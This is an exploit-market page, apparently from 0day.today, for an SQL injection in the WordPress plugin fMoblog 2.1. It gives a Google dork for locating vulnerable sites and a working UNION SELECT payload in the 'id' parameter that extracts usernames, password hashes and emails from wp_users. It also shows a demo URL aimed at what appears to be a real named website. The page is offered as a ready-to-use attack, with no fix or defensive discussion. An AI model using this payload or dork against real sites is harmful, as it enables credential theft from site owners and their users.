[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability

Author
strange kevin
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4938
Category
web applications
Date add
17-03-2009
Platform
unsorted
=============================================================
Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability
=============================================================


#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################



#  0day.today [2024-11-16]  #